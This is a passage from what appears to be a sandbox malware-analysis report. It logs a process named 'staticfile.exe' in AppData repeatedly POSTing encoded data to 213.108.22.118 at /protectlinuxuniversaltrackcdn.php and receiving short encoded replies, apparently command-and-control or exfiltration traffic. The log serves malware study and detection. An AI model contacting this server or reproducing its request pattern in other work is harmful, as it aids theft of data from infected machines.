                                        Data Ascii: UZY_UXP_U\WYPRZRXY[]Q^S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(>" !41>4[;Z?28<T3[7=6 #/'[#^1=-4._/%^/
                                        Nov 30, 2024 22:38:06.319633007 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:06.563534975 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:06 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        96192.168.2.450054213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:06.859503031 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:07.217067003 CET2544OUTData Raw: 50 59 59 55 50 5d 55 5a 55 5c 57 59 50 52 5a 56 58 54 5b 52 51 5a 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PYYUP]UZU\WYPRZVXT[RQZS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?-#+&./,#&+0W$-8)5;] /'-(2&X,4._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        97192.168.2.450057213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:07.854696035 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:08.201170921 CET1428OUTData Raw: 55 5c 5c 5d 55 55 55 5a 55 5c 57 59 50 5a 5a 55 58 58 5b 5f 51 5f 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\]UUUZU\WYPZZUXX[_Q_SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B+.148X%>?-<3S&4T%=?(%$#,&'[+%>,$._/%^/$
                                        Nov 30, 2024 22:38:09.170945883 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:09.406430960 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:08 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 15 28 06 04 59 29 38 35 5c 39 3f 24 51 26 16 21 58 3b 3d 0b 5e 28 03 39 13 29 3f 3d 1d 21 16 30 05 2b 07 36 1e 27 08 3e 59 3c 01 2b 5e 0c 1b 23 1c 3c 02 3d 5d 24 5d 28 5f 24 09 2f 02 36 1f 2f 5b 33 04 22 52 3e 28 29 04 37 31 2e 54 2f 0b 25 57 32 29 3b 03 29 06 23 1e 22 39 2f 56 0b 12 22 19 26 21 21 5b 26 2c 2c 1f 37 30 08 5f 22 08 0c 5a 20 01 35 56 36 01 32 5b 29 2e 2a 5a 21 33 3f 09 3d 2e 3d 12 31 0b 20 08 29 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #(Y)85\9?$Q&!X;=^(9)?=!0+6'>Y<+^#<=]$](_$/6/[3"R>()71.T/%W2);)#"9/V"&!![&,,70_"Z 5V62[).*Z!3?=.=1 )=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        98192.168.2.450059213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:07.977102041 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:08.326200008 CET2544OUTData Raw: 55 5b 5c 5f 50 5f 50 58 55 5c 57 59 50 58 5a 53 58 59 5b 52 51 5d 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[\_P_PXU\WYPXZSXY[RQ]SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D?>6^!2<^28,($;?0-8(&3Z#Y%V0=(23>94._/%^/,
                                        Nov 30, 2024 22:38:09.283706903 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:09.522475004 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        99192.168.2.450062213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:09.879962921 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:10.232438087 CET2544OUTData Raw: 50 5e 59 5a 50 5f 55 58 55 5c 57 59 50 5f 5a 55 58 55 5b 5f 51 58 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^YZP_UXU\WYP_ZUXU[_QXSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+>^!14X%$,+U2;'<>7,-W&-/&059._/%^/0
                                        Nov 30, 2024 22:38:11.244004011 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:11.487530947 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:10 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        100192.168.2.450068213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:11.728737116 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:12.153301001 CET2536OUTData Raw: 50 5b 59 54 55 5a 50 58 55 5c 57 59 50 5b 5a 52 58 5c 5b 5a 51 5d 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[YTUZPXU\WYP[ZRX\[ZQ]S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(-2X "^2_,,&+W$[?)5; ?"'(1 "^:4._/%^/8
                                        Nov 30, 2024 22:38:13.017134905 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:13.250288963 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:12 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        101192.168.2.450074213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:13.489844084 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:13.841831923 CET2544OUTData Raw: 50 5c 59 59 50 5f 55 5d 55 5c 57 59 50 5a 5a 5d 58 54 5b 5f 51 5a 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\YYP_U]U\WYPZZ]XT[_QZSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(>*7T?&= \;<4&+(V0=<)&<7/10?_19-4._/%^/$


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        102192.168.2.450075213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:14.547063112 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:14.906148911 CET1428OUTData Raw: 55 5b 59 55 55 5e 50 51 55 5c 57 59 50 59 5a 57 58 54 5b 5c 51 5d 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[YUU^PQU\WYPYZWXT[\Q]SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(.9#"X&> Z8<<&8#%= =5]4?)U&-(1 &Y9$._/%^/(
                                        Nov 30, 2024 22:38:15.903831005 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:17.032011032 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 07 29 38 32 5b 3c 28 2e 00 2c 3f 2c 1d 31 38 3e 01 2c 2e 35 15 28 3a 29 58 28 3f 22 0c 23 3b 2f 1f 3f 00 2a 1f 30 35 2e 58 3c 3b 2b 5e 0c 1b 20 41 2b 02 3d 5c 30 02 2c 16 30 33 28 58 35 32 23 1c 30 3d 2a 1e 3c 38 0c 59 22 31 26 50 2f 32 26 0d 32 07 24 5b 3d 3c 33 52 21 03 2f 56 0b 12 22 50 27 54 22 06 24 3f 24 11 34 09 22 5d 22 1f 36 5c 20 11 25 56 36 28 08 5a 29 2d 39 01 23 23 20 52 28 2d 29 10 31 32 05 51 2b 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: )82[<(.,?,18>,.5(:)X(?"#;/?*05.X<;+^ A+=\0,03(X52#0=*<8Y"1&P/2&2$[=<3R!/V"P'T"$?$4"]"6\ %V6(Z)-9## R(-)12Q+=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        103192.168.2.450076213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:14.667403936 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:15.015568972 CET2544OUTData Raw: 55 58 59 5a 55 5d 55 58 55 5c 57 59 50 5a 5a 53 58 58 5b 5d 51 58 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UXYZU]UXU\WYPZZSXX[]QXSYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(X&#1<&>// 1(7$(6, !W'[7%0"X.._/%^/$
                                        Nov 30, 2024 22:38:16.062680006 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:16.302418947 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        104192.168.2.450082213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:16.540277004 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:16.888825893 CET2544OUTData Raw: 50 59 59 59 55 59 50 58 55 5c 57 59 50 53 5a 5c 58 54 5b 52 51 5b 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PYYYUYPXU\WYPSZ\XT[RQ[SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!<772(]-<7R& T0$) '=+$ >.._/%^/
                                        Nov 30, 2024 22:38:17.925108910 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:18.158618927 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:17 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        105192.168.2.450088213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:18.659163952 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:38:19.013845921 CET2544OUTData Raw: 55 5c 59 58 55 5b 55 5c 55 5c 57 59 50 5c 5a 5c 58 5e 5b 5a 51 5d 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\YXU[U\U\WYP\Z\X^[ZQ]SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D+.X7T(2^;<01<'==%8 ?2'=71!,4._/%^/
                                        Nov 30, 2024 22:38:19.975637913 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:20.210510969 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        106192.168.2.450094213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:20.464447975 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:20.811386108 CET2544OUTData Raw: 55 59 5c 5d 55 5b 50 5e 55 5c 57 59 50 5c 5a 5d 58 55 5b 5e 51 51 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UY\]U[P^U\WYP\Z]XU[^QQS_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?*7T$Y$>/,31#%.4)'Z7$[4&U*Z,$._/%^/
                                        Nov 30, 2024 22:38:21.916877985 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:22.159959078 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        107192.168.2.450098213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:22.167916059 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:22.513752937 CET1428OUTData Raw: 50 59 5c 5f 55 58 55 5b 55 5c 57 59 50 52 5a 5d 58 5f 5b 53 51 50 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PY\_UXU[U\WYPRZ]X_[SQPSZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D+>"^ 20%>;83&7%.#)'71V';_2.._/%^/
                                        Nov 30, 2024 22:38:23.562110901 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:23.817183971 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 5d 28 28 04 1e 3f 3b 21 58 3a 11 38 54 31 06 26 02 38 3d 22 00 2b 04 1c 03 2a 2c 03 1d 36 38 09 12 3c 17 32 57 33 36 26 10 2b 2b 2b 5e 0c 1b 20 45 2b 05 32 07 24 38 24 5e 25 33 34 5b 20 22 24 03 30 04 3d 0e 3f 38 04 15 23 1f 39 0c 3b 0c 29 56 26 2a 2c 59 3d 01 33 11 21 29 2f 56 0b 12 22 57 30 54 3d 12 26 59 33 00 23 30 32 1a 36 36 0f 00 37 06 26 0c 35 06 3a 58 3c 2d 3e 58 23 30 3c 57 3d 3d 31 58 25 32 0e 09 2b 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #]((?;!X:8T1&8="+*,68<2W36&+++^ E+2$8$^%34[ "$0=?8#9;)V&*,Y=3!)/V"W0T=&Y3#02667&5:X<->X#0<W==1X%2+=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        108192.168.2.450100213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:22.293673038 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:38:22.638880014 CET2544OUTData Raw: 55 5d 59 54 55 5a 55 5c 55 5c 57 59 50 5d 5a 51 58 5e 5b 5e 51 5c 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U]YTUZU\U\WYP]ZQX^[^Q\S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B(]78^2=8/3U&8''[>% #/:$7Z2&:._/%^/8
                                        Nov 30, 2024 22:38:23.752121925 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:38:23.995842934 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:38:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        109192.168.2.450105213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:38:24.395206928 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
